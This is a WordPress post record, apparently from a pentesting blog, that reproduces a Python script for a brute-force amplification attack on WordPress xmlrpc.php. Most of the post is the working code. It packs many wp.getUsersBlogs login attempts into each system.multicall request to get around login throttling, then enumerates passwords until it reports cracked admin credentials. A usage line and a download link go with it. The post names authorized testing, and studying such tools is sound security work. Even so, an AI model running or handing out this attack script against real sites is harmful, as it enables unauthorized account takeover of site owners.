{"id":2638,"date":"2015-10-19T02:34:58","date_gmt":"2015-10-19T02:34:58","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=2638"},"modified":"2015-10-19T02:34:58","modified_gmt":"2015-10-19T02:34:58","slug":"wordpress-xml-rpc-brute-force-exploit-by-1n3","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=2638","title":{"rendered":"WordPress XML RPC Brute Force Exploit by 1N3"},"content":{"rendered":"<p>WordPress XML-RPC Brute Force Amplification PoC by 1N3. This small proof-of-concept launches a brute-force amplification attack against WordPress sites whose <code>xmlrpc.php<\/code> accepts <code>system.multicall<\/code>: every HTTP request bundles many <code>wp.getUsersBlogs<\/code> login attempts, so one request tests many passwords and per-request login throttling does not apply. The script decides success by string-matching the response body, so confirm any reported credential manually, and use it only against systems you are authorized to test.<br \/>\nUSAGE:<\/p>\n<pre>.\/wp-xml-brute http:\/\/target.com\/xmlrpc.php passwords.txt\n<\/pre>\n<pre class=\"lang:python decode:true\" title=\"Wordpress-XMLRPC-Brute-Force-Exploit\">#!\/usr\/bin\/python\n# WordPress XML-RPC Brute Force Amplification PoC by 1N3\n# Last Updated: 20151018\n# https:\/\/crowdshield.com\n#\n# ABOUT: This exploit launches a brute force amplification attack on target WordPress sites. 
Since XMLRPC allows multiple auth calls per request, amplification is possible and standard brute force protection will not block the attack.\n#\n# USAGE: .\/wp-xml-brute http:\/\/target.com\/xmlrpc.php passwords.txt\n#\nimport urllib, urllib2, sys, getopt\nfrom array import *\nclass bcolors:\n    HEADER = '\\033[95m'\n    OKBLUE = '\\033[94m'\n    OKGREEN = '\\033[92m'\n    WARNING = '\\033[93m'\n    FAIL = '\\033[91m'\n    ENDC = '\\033[0m'\n    BOLD = '\\033[1m'\n    UNDERLINE = '\\033[4m'\ndef main(argv):\n\targc = len(argv)\n\tif argc &lt;= 1:\n\t\tprint bcolors.OKBLUE + \" __      __                        .___                                             \" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"\/  \\    \/  \\   ____   _______    __| _\/ ______   _______    ____     ______   ______\" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"\\   \\\/\\\/   \/  \/  _ \\  \\_  __ \\  \/ __ |  \\____ \\  \\_  __ \\ _\/ __ \\   \/  ___\/  \/  ___\/\" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \" \\        \/  (  &lt;_&gt; )  |  | \\\/ \/ \/_\/ |  |  |_&gt; &gt;  |  | \\\/ \\  ___\/   \\___ \\   \\___ \\ \" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"  \\__\/\\  \/    \\____\/   |__|    \\____ |  |   __\/   |__|     \\___  &gt; \/____  &gt; \/____  &gt;\" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"       \\\/                           \\\/  |__|                   \\\/       \\\/       \\\/ \" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"\" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"\t\t\\ \/       _  _  __    _  _    ___ __    __ _  _  __ __\" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"\t\t X |V||  |_)|_)\/     |_)|_)| | | |_    |_ \/ \\|_)\/  |_ \" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + '\t\t\/ \\| ||__| \\|  \\__   |_)| \\|_| | |__   |  \\_\/| \\\\\\__|__' + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"\" + bcolors.ENDC\n\t\tprint \"\"\n\t\tprint bcolors.OKBLUE + \"+ -- --=[XML-RPC Brute Force Script v20151018 by 1N3 @ https:\/\/crowdshield.com\" + 
bcolors.ENDC\n        \tprint bcolors.OKBLUE + \"+ -- --=[usage: %s http:\/\/wordpress.org\/xmlrpc.php passwords.txt\" % (argv[0]) + bcolors.ENDC\n        \tsys.exit(0)\n\turl = argv[1] # SET TARGET\n\twordlist = argv[2] # SET CUSTOM WORDLIST\n\tusers = ['admin'] # USERS LIST, ADD MORE AS NEEDED OR CHANGE DEFAULT ADMIN\n\tprint bcolors.OKBLUE + \"\" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \" __      __                        .___                                             \" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"\/  \\    \/  \\   ____   _______    __| _\/ ______   _______    ____     ______   ______\" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"\\   \\\/\\\/   \/  \/  _ \\  \\_  __ \\  \/ __ |  \\____ \\  \\_  __ \\ _\/ __ \\   \/  ___\/  \/  ___\/\" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \" \\        \/  (  &lt;_&gt; )  |  | \\\/ \/ \/_\/ |  |  |_&gt; &gt;  |  | \\\/ \\  ___\/   \\___ \\   \\___ \\ \" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"  \\__\/\\  \/    \\____\/   |__|    \\____ |  |   __\/   |__|     \\___  &gt; \/____  &gt; \/____  &gt;\" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"       \\\/                           \\\/  |__|                   \\\/       \\\/       \\\/ \" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"\" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"\t\t\\ \/       _  _  __    _  _    ___ __    __ _  _  __ __\" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"\t\t X |V||  |_)|_)\/     |_)|_)| | | |_    |_ \/ \\|_)\/  |_ \" + bcolors.ENDC\n\tprint bcolors.OKBLUE + '\t\t\/ \\| ||__| \\|  \\__   |_)| \\|_| | |__   |  \\_\/| \\\\\\__|__' + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"\" + bcolors.ENDC\n\tprint \"\"\n\tprint bcolors.OKBLUE + \"+ -- --=[XML-RPC Brute Force Script v20151018 by 1N3 @ https:\/\/crowdshield.com\" + bcolors.ENDC\n\tprint bcolors.WARNING + \"+ -- --=[Brute forcing target: \" + url + \"\" + bcolors.ENDC\n\tdata1 = '&lt;?xml 
version=\"1.0\"?&gt;&lt;methodCall&gt;&lt;methodName&gt;system.multicall&lt;\/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;&lt;array&gt;&lt;data&gt;'\n\tdata2 = \"\"\n\tdata3 = '&lt;\/data&gt;&lt;\/array&gt;&lt;\/value&gt;&lt;\/param&gt;&lt;\/params&gt;&lt;\/methodCall&gt;'\n\tnum_lines = sum(1 for line in open(wordlist))\n\tf = open(wordlist)\n\tlines = f.readlines()\n\tpasswds = f.read().splitlines()\n\tf.close()\n\tnum = 0 # CURRENT LINE POSITION\n\tcount = 0 # HOW MANY AUTHS TO SEND PER REQUEST\n\twhile num &lt; num_lines:\n\t\t# SEND 50 AUTH REQUESTS PER REQUEST\n\t\tif count &lt; 1000:\n\t\t\tnum += 1\n\t\t\tcount += 1\n\t\t\t# REACHED END OF FILE, SEND REQUEST AND ATTEMPT BRUTE FORCE...\n\t\t\tif num &gt;= num_lines:\n\t\t\t\tdata = \"\" + data1 + \"\" + data2 + \"\" + data3\n\t\t\t\theader = 'headers={\"Content-Type\": \"application\/xml\"}'\n\t\t\t\treq = urllib2.Request(url, data, headers={'Content-Type': 'application\/xml'})\n\t\t\t\trsp = urllib2.urlopen(req)\n\t\t\t\tcontent = rsp.read()\n\t\t\t\t#print content\n\t\t\t\tif \"admin\" in content.lower():\n\t\t\t\t\tprint bcolors.OKGREEN + \"+ -- --=[Brute Force Amplification Attack Successful!\" + bcolors.ENDC\n\t\t\t\t\tprint bcolors.WARNING + \"+ -- --=[Starting Brute Force Enumeration...\" + bcolors.ENDC\n\t\t\t\t\tfor user in users:\n\t\t\t\t\t\twhile num &lt;= num_lines:\n\t\t\t\t\t\t\tnum -= 1\n\t\t\t\t\t\t\tpasswd = str(lines[num])\n\t\t\t\t\t\t\tdata = '&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;&lt;methodCall&gt;&lt;methodName&gt;wp.getUsersBlogs&lt;\/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;' + user + '&lt;\/value&gt;&lt;\/param&gt;&lt;param&gt;&lt;value&gt;' + passwd + '&lt;\/value&gt;&lt;\/param&gt;&lt;\/params&gt;&lt;\/methodCall&gt;'\n\t\t\t\t\t\t\theader = 'headers={\"Content-Type\": \"application\/xml\"}'\n\t\t\t\t\t\t\treq = urllib2.Request(url, data, headers={'Content-Type': 'application\/xml'})\n\t\t\t\t\t\t\trsp = urllib2.urlopen(req)\n\t\t\t\t\t\t\tcontent 
= rsp.read()\n\t\t\t\t\t\t\t#print content\n\t\t\t\t\t\t\tif \"incorrect\" in content.lower():\n\t\t\t\t\t\t\t\tprint bcolors.FAIL + \"+ -- --=[Wrong username or password: \" + user + \"\/\" + passwd + \"\" + bcolors.ENDC\n\t\t\t\t\t\t\telif \"admin\" in content.lower():\n\t\t\t\t\t\t\t\tprint bcolors.OKGREEN + \"+ -- --=[w00t! User found! WordPress is pwned! \" + user + \"\/\" + passwd + \"\" + bcolors.ENDC\n\t\t\t\t\t\t\t\tsys.exit(0)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tprint bcolors.WARNING + \"+ -- --=[Invalid response from target\" + bcolors.ENDC\n\t\t\t\t\t\t\t\tsys.exit(0)\n\t\t\t\telse:\n\t\t\t\t\tprint bcolors.FAIL + \"+ -- --=[Brute force failed\" + bcolors.ENDC\n\t\t\t\tbreak\n\t\t\t\tsys.exit(0)\n\t\t\telse:\n\t\t\t\tpasswd = str(lines[num])\n\t\t\t\tfor user in users:\n\t\t\t\t\tdata2 += str('&lt;value&gt;&lt;struct&gt;&lt;member&gt;&lt;name&gt;methodName&lt;\/name&gt;&lt;value&gt;&lt;string&gt;wp.getUsersBlogs&lt;\/string&gt;&lt;\/value&gt;&lt;\/member&gt;&lt;member&gt;&lt;name&gt;params&lt;\/name&gt;&lt;value&gt;&lt;array&gt;&lt;data&gt;&lt;value&gt;&lt;array&gt;&lt;data&gt;&lt;value&gt;&lt;string&gt;'+user+'&lt;\/string&gt;&lt;\/value&gt;&lt;value&gt;&lt;string&gt;'+passwd+'&lt;\/string&gt;&lt;\/value&gt;&lt;\/data&gt;&lt;\/array&gt;&lt;\/value&gt;&lt;\/data&gt;&lt;\/array&gt;&lt;\/value&gt;&lt;\/member&gt;&lt;\/struct&gt;&lt;\/value&gt;')\n\t\t# WE'VE REACHED THE LIMIT, SEND THE REQUEST AND RESET COUNTER\n\t\telse:\n\t\t\tcount = 0\n\t\t\tdata = \"\" + data1 + \"\" + data2 + \"\" + data3\n\t\t\theader = 'headers={\"Content-Type\": \"application\/xml\"}'\n\t\t\treq = urllib2.Request(url, data, headers={'Content-Type': 'application\/xml'})\n\t\t\trsp = urllib2.urlopen(req)\n\t\t\tcontent = rsp.read()\n\t\t\t#print content\n\t\t\tdata2 = \"\"\n\t\t\tif \"admin\" in content.lower():\n\t\t\t\tprint bcolors.OKGREEN + \"+ -- --=[Brute Force Amplification Attack Successful!\" + bcolors.ENDC\n\t\t\t\tprint bcolors.WARNING + \"+ -- --=[Starting Brute Force 
Enumeration...\" + bcolors.ENDC\n\t\t\t\tfor user in users:\n\t\t\t\t\twhile num &lt;= num_lines:\n\t\t\t\t\t\tpasswd = str(lines[num])\n\t\t\t\t\t\tdata = '&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;&lt;methodCall&gt;&lt;methodName&gt;wp.getUsersBlogs&lt;\/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;' + user + '&lt;\/value&gt;&lt;\/param&gt;&lt;param&gt;&lt;value&gt;' + passwd + '&lt;\/value&gt;&lt;\/param&gt;&lt;\/params&gt;&lt;\/methodCall&gt;'\n\t\t\t\t\t\theader = 'headers={\"Content-Type\": \"application\/xml\"}'\n\t\t\t\t\t\treq = urllib2.Request(url, data, headers={'Content-Type': 'application\/xml'})\n\t\t\t\t\t\trsp = urllib2.urlopen(req)\n\t\t\t\t\t\tcontent = rsp.read()\n\t\t\t\t\t\tnum -= 1\n\t\t\t\t\t\t#print content\n\t\t\t\t\t\tif \"incorrect\" in content.lower():\n\t\t\t\t\t\t\tprint bcolors.FAIL + \"+ -- --=[Wrong username or password: \" + user + \"\/\" + passwd + \"\" + bcolors.ENDC\n\t\t\t\t\t\telif \"admin\" in content.lower():\n\t\t\t\t\t\t\tprint bcolors.OKGREEN + \"+ -- --=[w00t! User found! WordPress is pwned! \" + user + \"\/\" + passwd + \"\" + bcolors.ENDC\n\t\t\t\t\t\t\tsys.exit(0)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint bcolors.WARNING + \"+ -- --=[Invalid response from target\" + bcolors.ENDC\n\t\t\t\t\t\t\tsys.exit(0)\n\t\t\telse:\n\t\t\t\tprint bcolors.FAIL + \"+ -- --=[Brute force failed\" + bcolors.ENDC\nmain(sys.argv)<\/pre>\n<p>&nbsp;<br \/>\n<a href=\"https:\/\/github.com\/1N3\/Wordpress-XMLRPC-Brute-Force-Exploit\" target=\"_blank\" rel=\"noopener noreferrer\">Download WordPress XML RPC Brute Force Exploit at Github by crowdshield<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WordPress XML-RPC Brute Force Amplification PoC by 1N3, this is a small PoC exploit to launch a brute force amplification attack on affected WordPress sites. 
USAGE: .\/wp-xml-brute http:\/\/target.com\/xmlrpc.php passwords.txt #!\/usr\/bin\/python # WordPress XML-RPC Brute Force Amplification PoC by 1N3 # Last Updated: 20151018 # https:\/\/crowdshield.com # # ABOUT: This exploit launches a brute force amplification<\/p>\n","protected":false},"author":1,"featured_media":2639,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[318,154,541,278],"tags":[588,589,569],"class_list":["post-2638","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-password-attacks","category-pentesting-tools","category-python","category-web-application","tag-1n3","tag-crowshield","tag-wordpress"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2638","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2638"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2638\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2638"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2638"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2638"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}